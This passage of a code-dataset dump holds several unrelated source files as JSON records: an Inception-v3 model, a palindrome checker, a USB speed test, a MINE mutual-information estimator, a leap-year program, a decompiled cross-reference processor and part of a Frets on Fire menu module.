conv2d_bn(branch7x7, 128, 1, 7)\n branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)\n \n branch7x7dbl = conv2d_bn(x, 128, 1, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 1, 7)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 128, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch7x7, branch7x7dbl, branch_pool],\n axis=channel_axis,\n name='mixed4')\n \n # mixed 5, 6: 17 x 17 x 768\n for i in range(2):\n branch1x1 = conv2d_bn(x, 192, 1, 1)\n \n branch7x7 = conv2d_bn(x, 160, 1, 1)\n branch7x7 = conv2d_bn(branch7x7, 160, 1, 7)\n branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)\n \n branch7x7dbl = conv2d_bn(x, 160, 1, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 1, 7)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 160, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n \n branch_pool = layers.AveragePooling2D(\n (3, 3), strides=(1, 1), padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch7x7, branch7x7dbl, branch_pool],\n axis=channel_axis,\n name='mixed' + str(5 + i))\n \n # mixed 7: 17 x 17 x 768\n branch1x1 = conv2d_bn(x, 192, 1, 1)\n \n branch7x7 = conv2d_bn(x, 192, 1, 1)\n branch7x7 = conv2d_bn(branch7x7, 192, 1, 7)\n branch7x7 = conv2d_bn(branch7x7, 192, 7, 1)\n \n branch7x7dbl = conv2d_bn(x, 192, 1, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 7, 1)\n branch7x7dbl = conv2d_bn(branch7x7dbl, 192, 1, 7)\n \n branch_pool = layers.AveragePooling2D((3, 3),\n strides=(1, 1),\n padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch7x7, branch7x7dbl, branch_pool],\n axis=channel_axis,\n name='mixed7')\n \n # mixed 8: 8 x 8 x 1280\n branch3x3 = conv2d_bn(x, 192, 1, 1)\n 
branch3x3 = conv2d_bn(branch3x3, 320, 3, 3,\n strides=(2, 2), padding='valid')\n \n branch7x7x3 = conv2d_bn(x, 192, 1, 1)\n branch7x7x3 = conv2d_bn(branch7x7x3, 192, 1, 7)\n branch7x7x3 = conv2d_bn(branch7x7x3, 192, 7, 1)\n branch7x7x3 = conv2d_bn(\n branch7x7x3, 192, 3, 3, strides=(2, 2), padding='valid')\n \n branch_pool = layers.MaxPooling2D((3, 3), strides=(2, 2))(x)\n x = layers.concatenate(\n [branch3x3, branch7x7x3, branch_pool],\n axis=channel_axis,\n name='mixed8')\n \n # mixed 9: 8 x 8 x 2048\n for i in range(2):\n branch1x1 = conv2d_bn(x, 320, 1, 1)\n \n branch3x3 = conv2d_bn(x, 384, 1, 1)\n branch3x3_1 = conv2d_bn(branch3x3, 384, 1, 3)\n branch3x3_2 = conv2d_bn(branch3x3, 384, 3, 1)\n branch3x3 = layers.concatenate(\n [branch3x3_1, branch3x3_2],\n axis=channel_axis,\n name='mixed9_' + str(i))\n \n branch3x3dbl = conv2d_bn(x, 448, 1, 1)\n branch3x3dbl = conv2d_bn(branch3x3dbl, 384, 3, 3)\n branch3x3dbl_1 = conv2d_bn(branch3x3dbl, 384, 1, 3)\n branch3x3dbl_2 = conv2d_bn(branch3x3dbl, 384, 3, 1)\n branch3x3dbl = layers.concatenate(\n [branch3x3dbl_1, branch3x3dbl_2], axis=channel_axis)\n \n branch_pool = layers.AveragePooling2D(\n (3, 3), strides=(1, 1), padding='same')(x)\n branch_pool = conv2d_bn(branch_pool, 192, 1, 1)\n x = layers.concatenate(\n [branch1x1, branch3x3, branch3x3dbl, branch_pool],\n axis=channel_axis,\n name='mixed' + str(9 + i))\n \n x = layers.GlobalAveragePooling2D()(x)\n x = layers.Dense(256)(x)\n \n inputs = img_input\n # Create model.\n model = models.Model(inputs, x, name='inception_v3')\n \n model.load_weights(\"face_recog_model-k-n-face_model.h5\")\n return model","sub_path":"Backend[Flask]/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8900,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"59675119","text":"n=int(input())\nrev=0\ntemp=n\nwhile(n>0):\n dig=n%10\t\n rev=rev*10+dig\n n=n//10\nif(temp==rev):\n print(\"no. is palindrome\")\nelse:\n print(\"no. 
is not palindrome\")\n\n","sub_path":"tprgm_palindrome.py","file_name":"tprgm_palindrome.py","file_ext":"py","file_size_in_byte":173,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3499036","text":"import usb.core\nimport usb.util\nfrom datetime import datetime\n\ndev = usb.core.find(idVendor=0x090c, idProduct=0x4096)\nprint(dev)\n\nITERATIONS = 1000\nBUFFER_SIZE = 65536\n\ndev.set_configuration()\n\nstarttime = datetime.now()\n\nfor i in range(0, ITERATIONS):\n data = dev.read(0x81, BUFFER_SIZE, 200)\n\nendtime = datetime.now()\n\ndelta = (endtime-starttime).total_seconds()\n\nprint(\"USB Time: {} seconds\".format(delta))\n\nspeed_Bsec = (ITERATIONS*BUFFER_SIZE)/delta\nspeed_MBsec = speed_Bsec/(1024*1024)\n\nprint(\"Transfer speed: {} MB/Sec\".format(speed_MBsec))\n","sub_path":"pythonTest/USB/usb30test.py","file_name":"usb30test.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"454650719","text":"\"\"\"\nUse MINE to estimate the MI(x, y) and MI(h, y)\nhttps://github.com/sungyubkim/MINE-Mutual-Information-Neural-Estimation-/blob/master/MINE.ipynb\n\"\"\"\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nimport torch.autograd as autograd\nimport torchvision\nimport torchvision.transforms as transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport argparse\nfrom tqdm import tqdm\n\nfrom models.resnet import ResNet34\nfrom models.wideresnet import wide_resnet_34_10, adjust_learning_rate\n\n\ndef mutual_information(joint, marginal, mine_net):\n t = mine_net(joint)\n et = torch.exp(mine_net(marginal))\n mi_lb = torch.mean(t) - torch.log(torch.mean(et))\n return mi_lb, t, et\n\n\ndef learn_mine(batch, mine_net, mine_net_optim, ma_et, ma_rate=0.01):\n # batch is a tuple of (joint, marginal)\n joint, marginal = batch\n # joint = torch.autograd.Variable(torch.FloatTensor(joint)).cuda()\n # marginal = torch.autograd.Variable(torch.FloatTensor(marginal)).cuda()\n mi_lb, t, et = mutual_information(joint, marginal, mine_net)\n ma_et = (1 - ma_rate) * ma_et + ma_rate * torch.mean(et)\n\n # unbiasing use moving average\n loss = -(torch.mean(t) - (1 / ma_et.mean()).detach() * torch.mean(et))\n # use biased estimator\n # loss = - mi_lb\n\n mine_net_optim.zero_grad()\n autograd.backward(loss)\n mine_net_optim.step()\n return mi_lb, ma_et\n\n\ndef sample_batch(data, device, robust_net, h, sample_mode='joint'):\n x, y = data\n x = x.to(device)\n y = y.type(torch.float).to(device)\n y = (y - 0.45) / 9 # normalize y\n if h:\n x = robust_net(x)\n dims = 1, 640, 8, 8\n else:\n dims = 1, 3, 32, 32\n if sample_mode == 'joint':\n y = y.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1)\n y = y.repeat(dims).type(torch.float)\n batch = torch.cat((x, y), 1)\n else:\n index = torch.randperm(y.shape[0])\n y = y[index]\n y = y.unsqueeze(-1).unsqueeze(-1).unsqueeze(-1)\n y = y.repeat(dims).type(torch.float)\n batch = torch.cat((x, y), 1)\n return batch\n\n\ndef ma(a, window_size=100):\n return [np.mean(a[i:i+window_size]) for i in range(0, len(a)-window_size)]\n\n\ndef train(trainloader, testloader, robust_net, mine_net, mine_net_optim, device, epochs, h):\n #\n iterator = tqdm(trainloader, ncols=0, leave=False)\n mi_lb_list = list()\n ma_et = 1.\n for i in range(1, epochs + 1):\n mine_net.train()\n # adjust_learning_rate(mine_net_optim, i)\n for j, data in enumerate(iterator):\n batch = sample_batch(data, device, 
robust_net, h), \\\n sample_batch(data, device, robust_net, h, sample_mode='marginal')\n mi_lb, ma_et = learn_mine(batch, mine_net, mine_net_optim, ma_et)\n mi_lb_list.append(mi_lb.item())\n desc = 'mi_lb: ' + \"{:10.4f}\".format(mi_lb.item())\n iterator.set_description(desc)\n\n print('Epoch: {}; mi_lb: {}'.format(i, mi_lb_list[-1]))\n\n return mi_lb_list\n\n\ndef get_cifar10(batch_size):\n transform_train = transforms.Compose([\n # transforms.RandomCrop(32, padding=4),\n # transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n # transforms.Normalize((0.4914, 0.4822, 0.4465), (0.2023, 0.1994, 0.2010)),\n # Normalization messes with l-inf bounds.\n ])\n\n trainset = torchvision.datasets.CIFAR10(root='data', train=True, download=True, transform=transform_train)\n trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=True, drop_last=True)\n transform_test = transforms.Compose([\n transforms.ToTensor()\n ])\n testset = torchvision.datasets.CIFAR10(root='data', train=False, download=True, transform=transform_test)\n testloader = torch.utils.data.DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=2)\n\n return trainloader, testloader\n\n\ndef draw():\n version = 'sung'\n plt.figure(figsize=[8, 5])\n mi_hy = 'mutual_info/mi_hy_{}.txt'.format(version)\n mi_xy = 'mutual_info/mi_xy_{}.txt'.format(version)\n hy = np.loadtxt(mi_hy)\n xy = np.loadtxt(mi_xy)\n # hy = ma(hy)\n # xy = ma(xy)\n plot_x = np.arange(len(hy))\n plt.plot(plot_x, hy, label='I(h, y)')\n plt.plot(plot_x, xy, label='I(x, y)')\n plt.title('MINE {}'.format(version))\n plt.xlabel('Iteration')\n plt.ylabel('Mutual Information')\n plt.legend()\n plt.savefig('mine_fig/hy_xy_{}.png'.format(version), dpi=300)\n\n\ndef calc_mi():\n parser = argparse.ArgumentParser(description='MINE robust model')\n parser.add_argument('--seed', default=9527, type=int)\n parser.add_argument('--epochs', default=21, type=int)\n parser.add_argument('--learning_rate', default=1e-3, type=float)\n parser.add_argument('--momentum', default=0.9, type=float)\n parser.add_argument('--weight_decay', default=1e-3, type=float)\n parser.add_argument('--h', default=True, type=bool) # whether I(x, y): False or I(h, y): True\n parser.add_argument('--batch_size', default=5, type=int)\n args = parser.parse_args()\n\n device = \"cuda\" if torch.cuda.is_available() else \"cpu\"\n robust_model = 'checkpoint/adv_ckpt_41.pt'\n robust_net = wide_resnet_34_10()\n checkpoint = torch.load(robust_model)\n robust_net.load_state_dict(checkpoint['net'])\n robust_net.to(device)\n\n if args.h:\n in_channels = 1280 # 6 = 3 * 2 for MI(x, y), 1280 = 640 * 2 for MI(h, y)\n else:\n in_channels = 6\n\n resnet34 = ResNet34(in_channels, args.h).cuda()\n trainloader, testloader = get_cifar10(args.batch_size)\n optimizer = optim.Adam(resnet34.parameters(), lr=args.learning_rate, weight_decay=args.weight_decay)\n mi_lb_list = train(trainloader, testloader, robust_net, resnet34, optimizer, device, args.epochs, args.h)\n result_cor_ma = ma(mi_lb_list)\n print('h: {}, last MI: {}'.format(args.h, result_cor_ma[-1]))\n if args.h:\n with open('mi_hy_sung.txt', 'w') as filehandle:\n for listitem in result_cor_ma:\n filehandle.write('%s\\n' % listitem)\n else:\n with open('mi_xy_sung.txt', 'w') as filehandle:\n for listitem in result_cor_ma:\n filehandle.write('%s\\n' % listitem)\n\n\nif __name__ == '__main__':\n # calc_mi()\n 
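# NOTE: calc_mi() dumps mi_hy_sung.txt / mi_xy_sung.txt into the working\n    # directory, while draw() reads them from mutual_info/; the dumps apparently\n    # need to be moved there (or the script run from mutual_info/) first.\n    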
draw()\n","sub_path":"mutual_info/mine_sung.py","file_name":"mine_sung.py","file_ext":"py","file_size_in_byte":6292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"148878831","text":"def main():\r\n def szokoev_e(sz):\r\n if sz % 400 ==0:\r\n return True\r\n elif sz % 100 == 0:\r\n return False\r\n elif sz % 4 == 0:\r\n return True\r\n return False\r\n\r\n sz = int(input(\"Adjon meg egy számot:\"))\r\n print(sz)\r\n if szokoev_e(sz):\r\n print(\"Szökőév\")\r\n else:\r\n print(\"Nem szökőév\")\r\nmain()\r\n","sub_path":"6het2fel.py","file_name":"6het2fel.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"122271849","text":"# uncompyle6 version 3.6.7\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.8.2 (tags/v3.8.2:7b3ab59, Feb 25 2020, 23:03:10) [MSC v.1916 64 bit (AMD64)]\n# Embedded file name: build/bdist.linux-x86_64/egg/anolislib/processes/xref.py\n# Compiled at: 2013-02-16 15:38:05\nfrom __future__ import unicode_literals\nimport re\nfrom lxml import etree\ntry:\n import json\nexcept ImportError:\n import simplejson as json\n\nfrom anolislib import utils\ninstance_elements = frozenset([b'span', b'abbr', b'code', b'var', b'i'])\nw3c_instance_elements = frozenset([b'abbr', b'acronym', b'b', b'bdo', b'big',\n b'code', b'del', b'em', b'i', b'ins',\n b'kbd', b'label', b'legend', b'q', b'samp',\n b'small', b'span', b'strong', b'sub',\n b'sup', b'tt', b'var'])\ninstance_not_in_stack_with = frozenset([b'dfn'])\nnon_alphanumeric_spaces = re.compile(b'[^a-zA-Z0-9 \\\\-\\\\_\\\\/\\\\|]+')\n\nclass xref(object):\n \"\"\"Add cross-references.\"\"\"\n\n def __init__(self, ElementTree, dump_xrefs=b'', dump_backrefs=False, **kwargs):\n self.dfns = {}\n self.instances = {}\n self.buildReferences(ElementTree, dump_backrefs=dump_backrefs, **kwargs)\n if dump_xrefs:\n self.dump(self.getDfns(dump_xrefs), dump_xrefs, **kwargs)\n self.addReferences(ElementTree, dump_backrefs=dump_backrefs, **kwargs)\n if dump_backrefs:\n self.dump(self.instances, b'backrefs.json', **kwargs)\n\n def buildReferences(self, ElementTree, allow_duplicate_dfns=False, **kwargs):\n for dfn in ElementTree.iter(b'dfn'):\n terms = self.getTerm(dfn, **kwargs).split(b'|')\n for term in set(t for t in terms if t):\n if not allow_duplicate_dfns and term in self.dfns:\n raise DuplicateDfnException(b'The term \"%s\" is defined more than once' % term)\n link_to = dfn\n for parent_element in dfn.iterancestors(tag=etree.Element):\n if parent_element.tag in utils.heading_content:\n link_to = parent_element\n break\n\n id = utils.generateID(link_to, **kwargs)\n link_to.set(b'id', id)\n self.dfns[term] = id\n self.instances[term] = []\n\n def getDfns(self, dump_xrefs, **kwargs):\n try:\n fp = open(dump_xrefs, b'r')\n data = json.load(fp)\n fp.close()\n data[b'definitions'] = self.dfns\n return data\n except IOError:\n raise XrefsFileNotCreatedYetException(b\"No such file or directory: '%s'. 
Please create it first.\\nIt should contain a an object with a 'url' property (whose value ends with a '#').\" % dump_xrefs)\n\n def dump(self, obj, f, **kwargs):\n d = json.dumps(obj, sort_keys=True, allow_nan=False, indent=2, separators=(',',\n ': '))\n fp = open(f, b'w')\n fp.write(d + b'\\n')\n fp.close()\n\n def addReferences(self, ElementTree, w3c_compat=False, w3c_compat_xref_elements=False, w3c_compat_xref_a_placement=False, use_strict=False, dump_backrefs=False, **kwargs):\n for element in ElementTree.iter(tag=etree.Element):\n if element.tag in instance_elements or (w3c_compat or w3c_compat_xref_elements) and element.tag in w3c_instance_elements:\n term = self.getTerm(element, w3c_compat=w3c_compat, **kwargs)\n if term in self.dfns:\n goodParentingAndChildren = True\n for parent_element in element.iterancestors(tag=etree.Element):\n if parent_element.tag in instance_not_in_stack_with or utils.isInteractiveContent(parent_element):\n goodParentingAndChildren = False\n break\n else:\n for child_element in element.iterdescendants(tag=etree.Element):\n if child_element.tag in instance_not_in_stack_with or utils.isInteractiveContent(child_element):\n goodParentingAndChildren = False\n break\n\n if goodParentingAndChildren:\n if element.tag == b'span':\n element.tag = b'a'\n element.set(b'href', b'#' + self.dfns[term])\n link = element\n else:\n link = etree.Element(b'a', {b'href': b'#' + self.dfns[term]})\n if w3c_compat or w3c_compat_xref_a_placement:\n for node in element:\n link.append(node)\n\n link.text = element.text\n element.text = None\n element.append(link)\n else:\n element.addprevious(link)\n link.append(element)\n link.tail = link[0].tail\n link[0].tail = None\n if dump_backrefs:\n t = utils.non_ifragment.sub(b'-', term.strip(utils.spaceCharacters)).strip(b'-')\n id = b'instance_' + t + b'_' + str(len(self.instances[term]))\n link.set(b'id', id)\n self.instances[term].append(id)\n elif use_strict and term and not utils.elementHasClass(element, b'secno') and b'data-anolis-spec' not in element.attrib and b'data-anolis-ref' not in element.attrib and element.getparent().tag not in instance_not_in_stack_with:\n raise SyntaxError(b'Term not defined: %s, %s.' 
% (term, element))\n\n return\n\n def getTerm(self, element, w3c_compat=False, w3c_compat_xref_normalization=False, **kwargs):\n if element.get(b'data-anolis-xref') is not None:\n term = element.get(b'data-anolis-xref')\n elif element.get(b'title') is not None:\n term = element.get(b'title')\n else:\n term = utils.textContent(element)\n term = term.strip(utils.spaceCharacters).lower()\n term = utils.spacesRegex.sub(b' ', term)\n if w3c_compat or w3c_compat_xref_normalization:\n term = non_alphanumeric_spaces.sub(b'', term)\n return term\n\n\nclass DuplicateDfnException(utils.AnolisException):\n \"\"\"Term already defined.\"\"\"\n\n\nclass XrefsFileNotCreatedYetException(utils.AnolisException):\n \"\"\"The argument to --dump-xrefs does not exist yet.\"\"\"","sub_path":"pycfiles/anomalous-0.0.16-py2.py3-none-any/xref.py","file_name":"xref.py","file_ext":"py","file_size_in_byte":6738,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"37401320","text":"from __future__ import division\nimport traceback\n####################################################################\r\n# -*- coding: iso-8859-1 -*- #\r\n# #\r\n# Frets on Fire #\r\n# Copyright (C) 2006 Sami Kyöstilä #\r\n# 2008 myfingershurt #\r\n# 2008 Blazingamer #\r\n# 2008 evilynux #\r\n# #\r\n# This program is free software; you can redistribute it and/or #\r\n# modify it under the terms of the GNU General Public License #\r\n# as published by the Free Software Foundation; either version 2 #\r\n# of the License, or (at your option) any later version. #\r\n# #\r\n# This program is distributed in the hope that it will be useful, #\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of #\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #\r\n# GNU General Public License for more details. #\r\n# #\r\n# You should have received a copy of the GNU General Public License #\r\n# along with this program; if not, write to the Free Software #\r\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, #\r\n# MA 02110-1301, USA. 
#\r\n#####################################################################\r\n\r\nfrom builtins import str\nfrom builtins import range\nfrom past.utils import old_div\nfrom OpenGL.GL import *\r\nimport math\r\nfrom FakeNetworking import socket\r\n\r\nfrom View import BackgroundLayer\r\nfrom Menu import Menu\r\nfrom Lobby import Lobby\r\nfrom Svg import ImgDrawing\r\nfrom Language import _\r\nimport Dialogs\r\nimport Config\r\nimport Audio\r\nimport Settings\r\nimport datetime\r\nimport sys\r\nimport Theme\r\nimport Player\r\nimport Version\r\nfrom Shader import shaders\r\nimport sys\nimport os\r\n\r\n#myfingershurt: needed for random menu music:\r\nimport random\r\nimport string\r\n\r\nimport Log\r\n\r\nclass MainMenu(BackgroundLayer):\r\n def __init__(self, engine):\r\n self.engine = engine\r\n\r\n self.logClassInits = Config.get(\"game\", \"log_class_inits\")\r\n if self.logClassInits == 1:\r\n Log.debug(\"MainMenu class init (MainMenu.py)...\")\r\n\r\n self.time = 0.0\r\n self.nextLayer = None\r\n self.visibility = 0.0\r\n self.active = False\r\n Player.practiceMode = False \r\n\r\n #myfingershurt: removing neck menu requirement:\r\n #self.neckMenuEnabled = False\r\n \r\n #self.neckMenuEnabled = Config.get(\"game\", \"neck_select_enabled\")\r\n\r\n self.gfxVersionTag = Config.get(\"game\", \"gfx_version_tag\")\r\n\r\n #self.tut = Config.get(\"game\", \"tut\")\r\n self.updateNeck()\n dPlayerConfig = None\r\n #Get theme\r\n self.theme = self.engine.data.theme\r\n self.themeCoOp = self.engine.data.themeCoOp\r\n self.themename = self.engine.data.themeLabel\r\n self.useSoloMenu = Theme.use_solo_submenu\r\n \r\n allowMic = True\r\n \r\n if self.theme == 0:\r\n allowMic = False\r\n\r\n try:\r\n #blazingamer\r\n self.menux = Theme.menuX\r\n self.menuy = Theme.menuY\r\n except Exception as e:\r\n Log.warn(\"Unable to load Theme menuX / Y positions: %s\" % e) \r\n self.menux = None\r\n self.menuy = None\r\n\r\n self.rbmenu = Theme.menuRB\r\n \r\n #MFH\r\n self.main_menu_scale = Theme.main_menu_scaleVar\r\n self.main_menu_vspacing = Theme.main_menu_vspacingVar\r\n\r\n if self.main_menu_scale == None:\r\n self.main_menu_scale = .5\r\n if self.main_menu_vspacing == None:\r\n self.main_menu_vspacing = 0.09\r\n\r\n\r\n \r\n \r\n \r\n\r\n try:\r\n self.engine.loadImgDrawing(self, \"background\", os.path.join(\"themes\",self.themename,\"menu\",\"mainbg.png\"))\r\n except IOError:\r\n self.background = None\r\n self.engine.loadImgDrawing(self, \"BGText\", os.path.join(\"themes\",self.themename,\"menu\",\"maintext.png\"))\r\n try:\r\n self.engine.loadImgDrawing(self, \"optionsBG\", os.path.join(\"themes\",self.themename,\"menu\",\"optionsbg.png\"))\r\n except IOError:\r\n self.optionsBG = None\r\n self.engine.loadImgDrawing(self, \"optionsPanel\", os.path.join(\"themes\",self.themename,\"menu\",\"optionspanel.png\"))\r\n \r\n #racer: added version tag\r\n if self.gfxVersionTag or Theme.versiontag == True:\r\n try:\r\n self.engine.loadImgDrawing(self, \"version\", os.path.join(\"themes\",self.themename,\"menu\",\"versiontag.png\"))\r\n except IOError:\r\n try:\r\n self.engine.loadImgDrawing(self, \"version\", \"versiontag.png\") #falls back on default versiontag.png in data\\ folder\r\n except IOError:\r\n self.version = None\r\n else:\r\n self.version = None\r\n\r\n\r\n \r\n #myfingershurt: random main menu music function, menu.ogg and menuXX.ogg (any filename with \"menu\" as the first 4 letters)\r\n filepath = self.engine.getPath(os.path.join(\"themes\",self.themename,\"sounds\"))\r\n self.files = 
[]\r\n allfiles = os.listdir(filepath)\r\n for name in allfiles:\r\n if os.path.splitext(name)[1] == \".ogg\":\r\n if name.find(\"menu\") > -1:\r\n self.files.append(name)\r\n \r\n\r\n if self.files:\r\n i = random.randint(0,len(self.files)-1)\r\n filename = self.files[i]\r\n sound = os.path.join(\"themes\",self.themename,\"sounds\",filename)\r\n self.menumusic = True\r\n engine.menuMusic = True\r\n\r\n self.song = Audio.Sound(self.engine.resource.fileName(sound))\r\n self.song.setVolume(self.engine.config.get(\"audio\", \"menu_volume\"))\r\n self.song.play() #no loop\r\n else:\r\n self.menumusic = False\r\n\r\n \r\n #####======= Racer: New Main Menu ======####\r\n\r\n self.opt_text_color = Theme.hexToColor(Theme.opt_text_colorVar)\r\n self.opt_selected_color = Theme.hexToColor(Theme.opt_selected_colorVar)\r\n\r\n if self.opt_text_color == None:\r\n self.opt_text_color = (1,1,1)\r\n if self.opt_selected_color == None:\r\n self.opt_selected_color = (1,0.75,0)\r\n\r\n\r\n newMultiplayerMenu = [\r\n (_(\"Host Multiplayer Game\"), self.hostMultiplayerGame),\r\n (_(\"Join Multiplayer Game\"), self.joinMultiplayerGame),\r\n ]\r\n \r\n editorMenu = Menu(self.engine, [\r\n (_(\"Edit Existing Song\"), self.startEditor),\r\n (_(\"Import New Song\"), self.startImporter),\r\n (_(\"Import GH(tm) Songs\"), self.startGHImporter),\r\n ])\r\n\r\n trainingMenu = [\r\n (_(\"Tutorials\"), self.showTutorial),\r\n (_(\"Practice\"), lambda: self.newLocalGame(mode1p = 1)),\r\n ]\r\n \r\n self.opt_bkg_size = [float(i) for i in Theme.opt_bkg_size]\r\n\r\n strCareer = \"\"\r\n strQuickplay = \"\"\r\n strSolo = \"\"\r\n strMultiplayer = \"\"\r\n strTraining = \"\"\r\n strSettings = \"\"\r\n strQuit = \"\"\r\n \r\n if self.theme == 1 and self.themeCoOp: #Worldrave - Put GH Co-op ahead of FoFix co-op for GH based theme's. 
Made more sense.\r\n multPlayerMenu = [\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"GH Battle\"), lambda: self.newLocalGame(players = 2, mode2p = 6, maxplayers = -1, allowDrum = False)), #akedrou- so you can block drums\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n (_(\"Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 5)),\r\n (_(\"FoFiX Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 3, allowMic = allowMic)), #Worldrave - Re-added this option for now.\r\n ]\r\n elif self.theme == 1 and not self.themeCoOp:\r\n multPlayerMenu = [\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n ]\r\n elif self.theme == 2:\r\n multPlayerMenu = [\r\n (_(\"FoFiX Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 3, maxplayers = 4, allowMic = allowMic)),\r\n (_(\"RB Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 4, maxplayers = 4, allowMic = allowMic)),\r\n (_(\"GH Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 5, maxplayers = 4)),\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n ]\r\n else:\r\n multPlayerMenu = [\r\n (_(\"FoFiX Co-Op\"), lambda: self.newLocalGame(players = 2, mode2p = 3, allowMic = allowMic)),\r\n (_(\"Face-Off\"), lambda: self.newLocalGame(players = 2, maxplayers = -1)),\r\n (_(\"Pro Face-Off\"), lambda: self.newLocalGame(players = 2, mode2p = 1, maxplayers = -1)),\r\n (_(\"Party Mode\"), lambda: self.newLocalGame(mode2p = 2)),\r\n ]\r\n \r\n if self.useSoloMenu is None:\r\n if self.theme == 0 or self.theme == 1: #GH themes = 6 main menu selections\r\n self.useSoloMenu = False\r\n else: #RB themes = 5 main menu selections\r\n self.useSoloMenu = True\r\n \r\n if not self.useSoloMenu:\r\n\r\n mainMenu = [\r\n (strCareer, lambda: self.newLocalGame(mode1p = 2, allowMic = allowMic)),\r\n (strQuickplay, lambda: self.newLocalGame(allowMic = allowMic)),\r\n ((strMultiplayer,\"multiplayer\"), multPlayerMenu),\r\n ((strTraining,\"training\"), trainingMenu),\r\n ((strSettings,\"settings\"), self.settingsMenu),\r\n (strQuit, self.quit),\r\n ]\r\n \r\n else:\r\n\r\n soloMenu = [\r\n (_(\"Solo Tour\"), lambda: self.newLocalGame(mode1p = 2, allowMic = allowMic)),\r\n (_(\"Quickplay\"), lambda: self.newLocalGame(allowMic = allowMic)),\r\n ]\r\n\r\n mainMenu = [\r\n #( ( _(strSolo), 1, (0,0) ), soloMenu),\r\n ((strSolo,\"solo\"), soloMenu),\r\n ((strMultiplayer,\"multiplayer\"), multPlayerMenu),\r\n ((strTraining,\"training\"), trainingMenu),\r\n ((strSettings,\"settings\"), self.settingsMenu),\r\n (strQuit, self.quit),\r\n ]\r\n\r\n\r\n \r\n self.menu = Menu(self.engine, mainMenu, onClose = lambda: self.engine.view.popLayer(self), pos = (12,12), textColor = self.opt_text_color, selectedColor = self.opt_selected_color)\r\n\r\n engine.mainMenu = self #Points engine.mainMenu to the one and only MainMenu object instance\r\n\r\n ## whether the main menu has come into view at least once\n self.shownOnce = False\n\n def updateNeck(self):\n engine = self.engine\n self.chosenNeck = Config.get(\"game\", \"default_neck\")\r\n 
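# 'exists' flags whether a neck image has loaded; each fallback below only\r\n    # runs when the previous attempt failed (chosen neck, then Neck_1, then defaultneck).\r\n    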
